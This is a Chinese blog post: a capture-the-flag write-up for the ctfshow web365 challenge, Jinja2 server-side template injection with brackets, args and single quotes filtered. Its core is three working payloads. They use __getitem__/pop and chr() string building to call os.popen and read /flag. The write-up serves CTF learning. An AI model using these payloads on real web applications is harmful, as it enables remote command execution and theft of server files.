ctfshow-web365(SSTI)

最新推荐文章于 2023-09-21 22:48:12 发布
最新推荐文章于 2023-09-21 22:48:12 发布
阅读量293 收藏
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62094846/article/details/124513965
版权

这次是把args [ 和' 过滤了

有两种方式可以绕过[

可以用__getitem__pop代替,因为pop会破坏数组的结构,所以更推荐用__getitem__

?name={%set+chr=[].__class__.__bases__[0].__subclasses__()[80].__init__.__globals__.__builtins__.chr%}{{[].__class__.__base__.__subclasses__()[132].__init__.__globals__[chr(112)%2bchr(111)%2bchr(112)%2bchr(101)%2bchr(110)%2b](chr(99)%2bchr(97)%2bchr(116)%2bchr(32)%2bchr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)).read()}}

 这里把上一道题有[]的都换成__getitem__()就可以(第一个的[]直接换成())

?name={%set chr=().__class__.__bases__.__getitem__(0).__subclasses__().__getitem__(80).__init__.__globals__.__builtins__.chr%}{{config.__class__.__init__.__globals__.__getitem__(chr(111)%2bchr(115)).popen(chr(99)%2bchr(97)%2bchr(116)%2bchr(32)%2bchr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)).read()}}

 用pop也可以,但是第二个还是要用__getitem__(0),用pop(0)会报错

?name={%set chr=().__class__.__bases__.__getitem__(0).__subclasses__().pop(80).__init__.__globals__.__builtins__.chr%}{{config.__class__.__init__.__globals__.pop(chr(111)%2bchr(115)).popen(chr(99)%2bchr(97)%2bchr(116)%2bchr(32)%2bchr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)).read()}}

m0_62094846
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
OfficeWeb365在线预览
专搞技术的小兔子
06-20 736
OfficeWeb365在线预览
officeweb365 试读
qq_39856096的博客
01-27 534
officeweb365 试读 public function ceshi(){ $file_url = I('file_url')?I('file_url') :'202001011111,2'; // $file_url = 'http://xxxx-medical.oss-cn-beijing.aliyuncs.com/document/1611218159000.docx'; $data = $this->encrypt('.
ctfshow web入门365 ssti过滤单引号+args+中括号
c1516175954的博客
09-21 114
所以采用url_for+GET传参构造payload。如题目所说,经过测试发现这些被过滤。
ctfshow-web366,367(SSTI)
m0_62094846的博客
05-05 257
_ args [ ' 都被过滤了 有绕过_的方法,但是因为过滤了[,也过滤了args,所以没法用 用attr的话还是会有_,还要加一个和request.args作用相似的东西,request.cookies
ctfshow web入门-SSTI
LYJ20010728的博客
09-09 1406
ctfshow web入门-SSTIweb361题目描述解题思路web362题目描述解题思路web363题目描述解题思路web364题目描述解题思路web365题目描述解题思路web366题目描述解题思路web367题目描述解题思路web368题目描述解题思路web369题目描述解题思路web370题目描述解题思路web371题目描述解题思路web372题目描述解题思路trick web361 题目描述 名字就是考点 解题思路 直接读取 FLAG 即可,这里利用的是 os._wrap_close
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
031-关于Flask SSTI,解锁你不知道的新姿势.pdf
09-20
031-关于Flask SSTI,解锁你不知道的新姿势.pdf
Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf
11-30
Server-Side Template Injection (SSTI) 是一种严重的网络安全漏洞,尤其在现代Web应用程序中,它可能导致远程代码执行(RCE)。2015年,James Kettle在黑帽大会上详细阐述了这种攻击方式,强调了它如何被误认为是跨...
fenjing工具,ssti
最新发布
12-17
标题中的“fenjing工具,ssti”指的是Fenjing,一个可能用于安全测试或Web应用漏洞扫描的工具,而“ssti”则是Server-Side Template Injection(服务器端模板注入)的缩写,这是一种常见的Web应用程序安全漏洞。...
高级java笔试题-Web-Security-Learning:网络安全学习https://chybeta.github.io/2017/08
06-03
在学习Web安全的过程中整合的一些资料。 该repo会不断更新,最近更新日期为:2017/12/21。 同步更新于: 01月29日更新: 新收录文章 mysql MSSQL postgresql 前端安全 php java-Web redis SSTI 信息搜集 渗透 Web-...
CTFshow SSTI
starttv的博客
11-21 614
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。模板引擎也会提供沙箱机制来进行漏洞防范,但是可以用沙箱逃逸技术来进行绕过。SSTI 就是服务器端模板注入(Server-Side Template Injection)
SSTI模板注入-中括号、args、单双引号被过滤绕过(ctfshow web入门365
T1ngSh0w的博客
03-28 1644
SSTI模板注入漏洞——中括号、单双引号、args被过滤。 ctfshow web入门365
SSTI模板注入-中括号、args、下划线、单双引号被过滤绕过(ctfshow web入门366)
T1ngSh0w的博客
03-29 742
SSTI模板注入漏洞,ctfshow web入门366 单引号被过滤,双引号被过滤,args被过滤,中括号被过滤、下划线被过滤
调用office web 365接口实现在线预览word文档,PDF,PPT
热门推荐
qq_27717857的博客
03-08 1万+
我项目中是直接用iframe显示: var id='office web 365创建的域名及端口的ID' var my_url="office web 365创建的域名及端口"+"后台接口返回的文档地址或服务器保存的静态文档" var iframe_src='http://ow365.cn/?i='+id+'&furl='+my_url; document.getElement
officeweb365 java_使用 Office for web 在 Microsoft 365 中协同工作
weixin_32265069的博客
02-19 799
提示若要帮助您的工作组成员快速访问文档,请向他们发送链接:在文档名称旁边单击“打开菜单”,然后单击“共享”。以下是与他人进行协作时应谨记的一些事项:Word 文档和 OneNote 笔记本 如果某些人正在使用 Word 或 OneNote 桌面程序,而其他人正在使用 Office 网页版 程序,也没关系。 在桌面程序中,共同创作在最新版本的 Office (Mac 和 Windows)中最适...
ctfshow web入门(SSTI
m0_62422842的博客
06-18 1341
ctfshow的web入门中ssti题目的总结
CTFshow-WEB入门-SSTI
feng的博客
02-21 4002
前言 开始SSTI,参考文章: flask之ssti模版注入从零到入门 SSTI模板注入绕过(进阶篇) 记录一下自己学习的东西: __class__ 类的一个内置属性,表示实例对象的类。 __base__ 类型对象的直接基类 __bases__ 类型对象的全部基类,以元组形式,类型的实例通常没有属性 __bases__ __mro__ 此属性是由类组成的元组,在方法解析期间会基于它来查找基类。 __subclass
[Web安全学习] SSTL模板注入总结
Y1seco的博客
08-18 1370
前置知识 引自 bfengj __class__ 类的一个内置属性,表示实例对象的类。 __base__ 类型对象的直接基类 __bases__ 类型对象的全部基类,以元组形式,类型的实例通常没有属性 __bases__ __mro__ 此属性是由类组成的元组,在方法解析期间会基于它来查找基类。 __subclasses__() 返回这个类的子类集合,Each class keeps a list of w
ctfshow ssti
07-27
CTFShow SSTI(Server-Side Template Injection)是一个与安全相关的话题,它涉及到服务器端模板注入漏洞。在某些情况下,当应用程序接受用户输入并将其作为模板的一部分进行解析时,攻击者可以利用这个漏洞来执行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值